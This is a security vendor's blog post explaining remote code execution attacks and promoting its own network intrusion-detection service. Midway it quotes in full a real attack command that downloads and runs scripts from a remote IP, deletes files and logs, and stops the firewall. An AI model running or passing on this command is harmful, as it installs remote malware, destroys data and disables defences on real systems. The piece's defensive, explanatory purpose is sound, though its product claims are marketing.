Exploiting RCE (Remote Code Execution) vulnerabilities: the nightmare of antivirus, EDR and SIEM.

Several RCE (Remote Code Execution) security vulnerabilities are regularly reported on the market (e.g. CVE-2023-27997 - Fortigate SSL VPN, CVE-2021-31207 Proxyshell, CVE-2021-34527 PrintNightmare, etc.).

They are very often reported as critical, and almost all make the headlines. Some, such as ProxyShell, PrintNightmare, MS17-010 EternalBlue, and others, are highly publicized.

What makes these types of attacks more dangerous than others? How can we protect ourselves against these attacks?

What is a RCE vulnerability?

Remote code execution (RCE) is a type of attack in which the attacker launches remote commands against a given target. The commands issued by the attacker are executed by the attacked machine, as if the attacker were connected to it. This is achieved by exploiting an existing vulnerability on the target.

Generally, the vulnerability exploited is zero-day (unknown), which greatly increases the number of potential victims. As an example, in 2017 the exploitation of the MS17-010 EternalBlue vulnerability to distribute the Wannacry ransomware infected over 200,000 computers in 3 days. Believe it or not, we're still finding this critical vulnerability in networks in 2023!

Consequences of exploiting an RCE vulnerability

The consequences of exploiting a RCE vulnerability are diverse and varied. Here are just a few examples:

Introducing ransomware on the attacked target. The ransomware can then spread throughout the network.
Access confidential data.
Maliciously modifying data required for processing (which can have serious consequences, depending on the domain).
Exfiltrate data on the target.
Give the attacker permanent remote access, with administrator rights.
Shut down the target or create malfunctions.

RCE vulnerability exploit codes give antivirus, EDR and SIEM the runaround

In some of the attacks we've seen in the field, RCE vulnerability exploit code is able to remotely shut down the antivirus or EDR, before executing its payload (shellcode).

Given their ability to remotely shut down security tools on your machines, you should consider that you are not fully protected against the exploitation of RCE vulnerabilities with an antivirus or EDR. Nor are SIEMs suitable for detecting RCE attacks.

Using obfuscation techniques to bypass security tools

To make the code used to exploit RCE vulnerabilities difficult to detect, hackers often use obfuscation techniques (e.g. Base64) to hide the true nature of the code. Security tools that are unable to interpret obfuscated code will not be able to detect it.

Example of a RCE malicious code in plain text (real case).

AA..AAAA cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://185.163.47.189/xb.sh; curl -O http://185.163.47.189/xb.sh; chmod 777 xb.sh; sh xb.sh; tftp 185.163.47.189 -c get xb.sh; chmod 777 xb.sh; sh xb.sh; tftp -r xb2.sh -g 185.163.47.189; chmod 777 xb2.sh; sh xb2.sh; ftpget -v -u anonymous -p anonymous -P 21 185.163.47.189 xb1.sh xb1.sh; sh xb1.sh; rm -rf xb.sh xb.sh xb2.sh xb1.sh; rm -rf *; rm -rf /var/log/wtmp; rm -rf ~/.bash_history; rm -rf /bin/netstat; history -w; service iptables stop; /sbin/iptables -F;/sbin/iptables -X; ulimit -n 999999;ulimit -u 999999; history -c; history -w

When the malicious code runs, it downloads another malicious script called xb.sh from a remote malicious host (http://185.163.47[.]189). The malicious code then gives full rights to the xb.sh script (chmod 777 xb.sh), executes the script, stops the firewall on the target server (iptables stop service) and so on. After execution, the malicious code deletes itself (rm -rf xb.sh), erasing all traces of its presence. And all this without the need to authenticate on the victim server. Impressive!

Such malicious code can be detected by analyzing its content (e.g. finding the pattern firewall shutdown, etc.).

The same malicious code in obfuscated form (in base64) to make it undetectable

The obfuscated version of the malicious code becomes very difficult to detect.

Tools and measures that do not protect against the exploitation of RCE vulnerabilities

The following measures won't protect you from exploiting RCE vulnerabilities:

Antivirus and EDR.
SIEM (log management tools). To find out more about the intrusion detection capabilities of SIEMs, please visit this link.
Passwords (even complex ones) and passphrases.
Multi-factor authentication (MFA).

Tools and measures to protect against the exploitation of RCE vulnerabilities

Tools that protect against RCE attacks are at the network perimeter level, excluding SIEMs whose intrusion detection capabilities are very basic.

Appropriate tools are:

Intrusion detection and prevention systems (IDS/IPS/NDR), such as Streamscan's CDS, to detect shellcodes/webshells.
Application firewalls (WAF) to detect webshells.

In addition to these tools, good cybersecurity hygiene helps reduce risks. Here are some recommendations:

Security vulnerability management: quickly correct RCE vulnerabilities as soon as they are reported.
Reducing the attack surface: limit the exposure of your servers to the strict minimum necessary. Don't expose a server to the Internet if you don't have to.
Server hardening to reinforce security.
24/7 network security monitoring.

How can Streamscan help?

Cyber attacks are exploding all the time. Without continuous security monitoring, you're completely blind to the attacks targeting you. You can't defend against what you can't see.

Let us put our eyes on your network. Join our MDR managed monitoring platform powered by our IDS/IPS named CDS and protect yourself from cyberattacks.